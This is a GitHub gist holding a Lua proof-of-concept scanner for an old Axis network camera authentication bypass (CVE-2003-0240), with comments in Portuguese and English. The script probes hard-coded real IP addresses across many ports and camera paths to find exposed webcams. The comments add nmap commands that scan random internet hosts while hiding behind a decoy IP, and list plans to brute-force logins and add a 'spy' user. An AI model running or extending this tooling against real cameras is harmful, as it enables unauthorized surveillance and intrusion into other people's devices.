Last active
June 22, 2024 11:18
-
-
Save MrCl0wnLab/5d92459bd138a8e405ba6179239c8c11 to your computer and use it in GitHub Desktop.
POC Request Axis Cam ( CVE: CVE-2003-0240 )
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
--[[ | |
-- BY MrCl0wnLab & r00t-3xp10it | |
-- https://gist.github.com/MrCl0wnLab | |
axis-network-camera-http-authentication-bypass | |
https://www.coresecurity.com/content/axis-network-camera-http-authentication-bypass | |
CVE: CVE-2003-0240 | |
Vulnerability Description: | |
An Axis Network Camera captures and transmits live images directly over an IP network | |
(e.g. LAN/intranet/Internet), enabling users to remotely view and/or manage the camera | |
from a Web browser on any computer. For more information see http://www.axis.com | |
After setting up the Axis Camera, the user is provided with Web-based Administration | |
Tools for configuring and managing the camera by accessing http://camera-ip/admin/admin.shtml, | |
which requires a username and password. | |
We have discovered the following security vulnerability: by accessing h | |
ttp://camera-ip//admin/admin.shtml (notice the double slash) the authentication | |
for "admin" is bypassed and an attacker gains direct access to the configuration. | |
Using this vulnerability, an attacker can reset the root password, then enable | |
the telnet server by modifying configuration files, giving the attacker interactive | |
access to a Unix like command line, allowing her to execute arbitrary commands as root. | |
Vulnerable Packages: | |
. AXIS 2100 Network Camera versions 2.32 and previous | |
. AXIS 2110 Network Camera versions 2.32 and previous | |
. AXIS 2120 Network Camera versions 2.32 and previous | |
. AXIS 2130 PTZ Network Camera versions 2.32 and previous | |
. AXIS 2400 Video Server versions 2.32 and previous | |
. AXIS 2401 Video Server versions 2.32 and previous | |
. AXIS 2420 Network Camera versions 2.32 and previous | |
. AXIS 2460 Network DVR versions 3.00 and previous | |
. AXIS 250S Video Server versions 3.02 and previous | |
https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=21492 | |
--------------------------------------------------- | |
Axis Network Camera HTTP Authentication Bypass Vulnerability | |
Bugtraq ID: | 7652 | |
Class: | Access Validation Error | |
CVE: | CVE-2003-0240 | |
Remote: | Yes | |
Local: | No | |
Published: | May 27 2003 12:00AM | |
Updated: | Jul 11 2009 10:06PM | |
TITLE LIST: | |
Axis 2420 Video Server 2.32 | |
Axis 2420 Network Camera 2.32 | |
Axis 2420 Network Camera 2.31 | |
Axis 2420 Network Camera 2.30 | |
Axis 2401 Video Server 2.32 | |
Axis 2401 Video Server 2.31 | |
Axis 2401 Video Server 2.30 | |
Axis 2400 Video Server 2.32 | |
Axis 2400 Video Server 2.31 | |
Axis 2400 Video Server 2.30 | |
Axis 2130 PTZ Network Camera 2.32 | |
Axis 2130 PTZ Network Camera 2.31 | |
Axis 2130 PTZ Network Camera 2.30 | |
Axis 2120 Network Camera 2.32 | |
Axis 2120 Network Camera 2.31 | |
Axis 2120 Network Camera 2.30 | |
Axis 2110 Network Camera 2.32 | |
Axis 2110 Network Camera 2.31 | |
Axis 2110 Network Camera 2.30 | |
Axis 2100 Network Camera 2.32 | |
Axis 2100 Network Camera 2.31 | |
Axis 2100 Network Camera 2.30 | |
Axis 2100 Network Camera 2.34 | |
URI: | |
/admin/admin.shtml | |
https://www.securityfocus.com/bid/7652/info | |
--------------------------------------------------- | |
]]-- | |
-- DEPENDENCIES (lua libraries) -- | |
local http = require("socket.http") | |
local string = require("string") | |
local os = require("os") | |
local ltn12 = require("ltn12") | |
local options = {header={}} | |
local title ,result,uri_list,green_color,by_module,f,uri,check, | |
yellow_color,white_color,error_color,reset_color,colors,ports,targetPort | |
uri = "http://216.99.115.136" --> target teste1 | |
uri = "http://185.32.182.75" --> target teste2 | |
uri = "http://www.google.com.br" --> target teste3 | |
options['header']['User-Agent'] = "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25" --> use iPhone,safari User-agent OR your own... | |
options['header']['Accept-Language'] = "en-GB,en;q=0.8,sv" --> use en-GB as attacker default install language | |
options['header']['Cache-Control'] = "no-store" --> Instruct webserver to not write it to disk (do not to cache it) | |
ports = { 80, 81, 82, 83, 84, 85, 86, 92, 8080, 8081, 8082, 8083, 8084, 48624, 55752,55754,55756 } | |
-- SET VALUES COLOR TERMINAL USE IN FUNCTION -- | |
colors = { | |
-- attributes | |
reset = 0, | |
clear = 0, | |
bright = 1, | |
dim = 2, | |
underscore = 4, | |
blink = 5, | |
reverse = 7, | |
hidden = 8, | |
-- foreground | |
black = 30, | |
red = 31, | |
green = 32, | |
yellow = 33, | |
blue = 34, | |
magenta = 35, | |
cyan = 36, | |
white = 37, | |
-- background | |
onblack = 40, | |
onred = 41, | |
ongreen = 42, | |
onyellow = 43, | |
onblue = 44, | |
onmagenta = 45, | |
oncyan = 46, | |
onwhite = 47, | |
} | |
-- FUNCTION SET COLOR TERMINAL -- | |
local function makecolor(value) | |
value = string.char(27) .. '[1;' .. tostring(value) .. 'm' | |
return value | |
end | |
-- SET VALUES COLOR TERMINAL -- | |
green_color = makecolor(colors.green) | |
white_color = makecolor(colors.white) | |
error_color = makecolor(colors.red) | |
reset_color = makecolor(colors.reset) | |
yellow_color = makecolor(colors.yellow) | |
-- COLORING MADE BY MODULE -- | |
by_module = white_color.."MrCl0wnLab"..reset_color | |
uri_list = { | |
-- URI AXIS | |
"/indexFrame.shtml", | |
"/view/viewer_index.shtml", | |
"/view/index.shtml", | |
"/view/view.shtml", | |
"/ViewerFrame.shtml", | |
"/MultiCameraFrame", | |
"/view/index2.shtml", | |
"/RecordFrame?", | |
"/index.shtml", | |
"/admin/admin.shtml", | |
"/indexFrame.shtml", | |
"/visitor_center/i-cam.html", | |
"/webcam/view.shtml", | |
"/webcam_code.php", | |
"/stadscam/Live95j.asp", | |
"/sub06/cam.php", | |
"/CgiStart", | |
"/cgi-bin/blank.php?strona=" | |
} | |
-- FUNCTION REQUEST ARRAY URI -- | |
function requestCam(uri,uri_list,header_op) | |
local t = {} | |
print(string.format("| %sFiles's:%s",yellow_color,reset_color)) | |
for i, intable in pairs(uri_list) do | |
local body, statusCode, headers, statusText = http.request{ | |
url=uri..intable, sink = ltn12.sink.table(t) | |
} | |
if(statusCode == 200) then | |
print(string.format("| [%s].....: %s%s", statusCode,uri,intable)) | |
-- RETURN ARRAY VALUES -- | |
return {http_body=table.concat(t),http_code=statusCode,http_header=headers,http_status=statusText,http_uri=uri..intable} | |
else | |
print(string.format("| [%s].....: %s%s",statusCode,uri,intable)) | |
t = {} | |
end | |
end | |
print(string.format("|\n|\n| [ABORT]: %sNone Match (uri) has been found in AXISwebcam-recon db.%s\n|\n",error_color,reset_color)) | |
os.execute("sleep 1") | |
end | |
-- BANNER -- | |
print("\n\tBY MrCl0wnLab") | |
print("\thttps://gist.github.com/MrCl0wnLab") | |
print("\tCheck: Axis Network Camera HTTP Authentication Bypass Vulnerability") | |
-- EXEC REQUESTS -- | |
print(string.format("\n| %sPort's:%s", yellow_color,reset_color)) | |
for p, port in pairs(ports) do | |
targetPort = uri..":"..port | |
print(string.format("| Testing...: %s%s",port,reset_color)) | |
-- TEST PORT REQUESTS -- | |
r,c,h = http.request(targetPort) | |
if(c == 200) then | |
print("|_") | |
-- REQUEST FILES webcam -- | |
result = requestCam(targetPort,uri_list,options) | |
break | |
end | |
end | |
if(result~=nil) then | |
-- PRINT HEADER HTTP -- | |
print(string.format("|_\n| %sHeader:%s",yellow_color,reset_color)) | |
for i, intable in pairs(result.http_header) do | |
print(string.format("| [%s] => %s",i,intable)) | |
end | |
-- GREP TITLE -- | |
title = string.match(result.http_body, "<[Tt][Ii][Tt][Ll][Ee][^>]*>([^<]*)</[Tt][Ii][Tt][Ll][Ee]>") | |
print(string.format("|_\n| %sAXISwebcam-recon:%s",yellow_color,reset_color)) | |
print(string.format("| %sTitle:%s%s",yellow_color,title,reset_color)) | |
-- List {table} of HTTP TITLE tags - | |
tbl = {"AXIS Video Server", | |
"Network Camera TUCCAM1", | |
"Network Camera NetworkCamera", | |
"Network Camera Hwy285/cr43", | |
"Network Camera Capitanía", | |
"Live View / - AXIS", | |
"Live view / - AXIS 205 version 4.03", | |
"Live view / - AXIS 205 Network Camera version 4.05", | |
"Live view / - AXIS 205 Network Camera version 4.05.1", | |
"Live view / - AXIS 205 Network Camera version 4.04", | |
"Live view - AXIS P5534-E Network Camera", | |
"Live view - AXIS 213 PTZ Network Camera version 4.12", | |
"Live view - AXIS 206M Network Camera version 4.11", | |
"Live view - AXIS P1354 Network Camera", | |
"Live view - AXIS P1344 Network Camera", | |
"Live view - AXIS M1114 Network Camera", | |
"Live view - AXIS M1103 Network Camera", | |
"Live view - AXIS M1025 Network Camera", | |
"Live view - AXIS 240Q Video Server", | |
"Live view - AXIS 221 Network Camera", | |
"Live view - AXIS 215 PTZ Network Camera", | |
"Live view - AXIS 214 PTZ Network Camera", | |
"Live view - AXIS 213 PTZ Network Camera", | |
"Live view - AXIS 211 Network Camera", | |
"Live view - AXIS 211 Network Camera version 4.11", | |
"Live view - AXIS 211 Network Camera version 4.10", | |
"AXIS V5914 PTZ Network Camera 5.75.1.11", | |
"AXIS Q7401 Video Encoder 5.51.5.1", | |
"AXIS Q6045-E Network Camera", | |
"AXIS Q6045-E Mk II Network Camera", | |
"AXIS Q6044-E Network Camera", | |
"AXIS Q6042-E PTZ Dome Network Camera 5.70.1.4", | |
"AXIS Q6034-E PTZ Dome Network Camera 5.41.4", | |
"AXIS Q3505 Fixed Dome Network Camera 6.30.1.1", | |
"AXIS Q1765-LE Network Camera 5.55.2.3", | |
"AXIS Q1615 Network Camera", | |
"AXIS P5635-E Mk II PTZ Dome Network Camera 8.40.2.2", | |
"AXIS P5635-E Mk II Network Camera", | |
"AXIS P5534 PTZ Dome Network Camera 5.51.5", | |
"AXIS P5514 Network Camera", | |
"AXIS P3354 Fixed Dome Network Camera 5.40.17", | |
"AXIS P1435-LE Network Camera", | |
"AXIS P1425-LE Network Camera", | |
"AXIS P1365 Mk II Network Camera", | |
"AXIS P1357 Network Camera", | |
"AXIS P1354 Fixed Network Camera 6.50.3", | |
"AXIS P1354 Fixed Network Camera 5.60.1", | |
"AXIS P1353 Network Camera 6.50.2.3", | |
"AXIS M5013 Network Camera", | |
"AXIS M3026 Network Camera", | |
"AXIS M3004 Network Camera 5.51.5.1", | |
"AXIS M2025-LE Network Camera 8.50.1", | |
"AXIS M1145-L Network Camera 6.50.3", | |
"AXIS M1124 Network Camera", | |
"AXIS F34 Network Camera 6.50.2.3", | |
"AXIS 243Q(2) Blade 4.45", | |
"Axis 2420 Video Server 2.32", | |
"Axis 2420 Network Camera 2.32", | |
"Axis 2420 Network Camera 2.31", | |
"Axis 2420 Network Camera 2.30", | |
"Axis 2401 Video Server 2.32", | |
"Axis 2401 Video Server 2.31", | |
"Axis 2401 Video Server 2.30", | |
"AXIS 2400 Video Server", | |
"Axis 2400 Video Server 2.32", | |
"Axis 2400 Video Server 2.31", | |
"Axis 2400 Video Server 2.30", | |
"AXIS 214 PTZ Network Camera 4.49", | |
"Axis 2130 PTZ Network Camera 2.32", | |
"Axis 2130 PTZ Network Camera 2.31", | |
"Axis 2130 PTZ Network Camera 2.30", | |
"Axis 2120 Network Camera 2.34", | |
"Axis 2120 Network Camera 2.32", | |
"Axis 2120 Network Camera 2.31", | |
"Axis 2120 Network Camera 2.30", | |
"Axis 2110 Network Camera 2.32", | |
"Axis 2110 Network Camera 2.31", | |
"Axis 2110 Network Camera 2.30", | |
"Axis 2100 Network Camera 2.34", | |
"Axis 2100 Network Camera 2.32", | |
"Axis 2100 Network Camera 2.31", | |
"Axis 2100 Network Camera 2.30"} | |
-- COUNT TOTAL ARRAY TITLE | |
local count = { i=0 , t=0 } | |
for i, intable in ipairs(tbl) do | |
count.t = count.t+1 | |
end | |
-- TEST TITLE -- | |
for i, intable in ipairs(tbl) do | |
local validar = string.match(title, intable) | |
if(title == intable) then | |
print(string.format("|\n|\n| STATUS...: %sAXIS WEBCAM FOUND%s",green_color,reset_color)) | |
print(string.format("| TITLE...: %s%s%s",green_color,intable,reset_color)) | |
print(string.format("| WEBCAM ACCESS...: %s%s%s",green_color,result.http_uri,reset_color)) | |
print(string.format("| Module Author...: %s\n|\n",by_module)) | |
break --> break execution (loop) if a match string its found. | |
else | |
print(string.format("| [%s] TESTING...: %s",count.i,intable)) | |
os.execute("sleep 0.5") | |
count.i = count.i+1 | |
if (count.i == count.t) then --> why ? Because its the number of TITLE tags present in the {table} list. | |
return print(string.format("|\n|\n| STATUS...: %sNONE AXIS WEBCAM FOUND%s\n Module Author...: %s\n\n",error_color,reset_color,by_module)) | |
end | |
end | |
end | |
end | |
Proximas functions:
via painel /admin/admin.shtml
- Check Version via: file CGI and header['server']
- Set Faixa IP
- Save Vulns
- Set Faixa IP x Pais
- Grep Users
- Add User Spy
- Grep Time Zone
- Grep Network - TCP/IP
- Return Geolocation ip
- Usar API Showda Select=axis
- Brute Force
Cleiton experimentando o switch -iR do nmap deparei-me com um erro de execuçao do nosso script ..
- Repoduçao:
- nmap -sS -v -Pn -n -T4 -O -iR 500 -p 92,8080-8082 --open --reason --script=AXISwebcam-recon.nse -oN webcams_reports.txt
- Quando o nosso script encontra 'authentication logins' nao consegue correr a 'TITLE' search function contra esse host
- Mas continua a correr a funcçao toda (uri search & title search) contra os outros alvos encontados (not auth)..
- Final Notes: se quisermos fazer um nse para fazer brute-force contra http auth,,, basta procurar-mos por [401] error code ;)
SourceCode Update
r00t-3xp10it - AXISwebcam-recon.nse
screenshots
- Auth login found
- Running againts multiple targets (auth target also in host table)
- running -iR nmap switch == More error codes (sourcecode update)
- i also have added a new user input option modem=true demonstration how to capture http modem login pages.
Final Notes:
Version 1.9 its only available in my gist here I didnt updated my oficial repo with this changes..
- Try This:: WAN Random Search + Syn Ack + Decoy Ip addr
sudo nmap -sS -v -Pn -n -T5 -iR 700 -p 8080-8086 --open --script=http-headers.nse,AXISwebcam-recon.nse -D 65.49.82.3 -oN webcam_reports.txt
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
neste exemplo esqueceste-te de 'declarar' a variavel uri que vai ser precissa mais a frente no script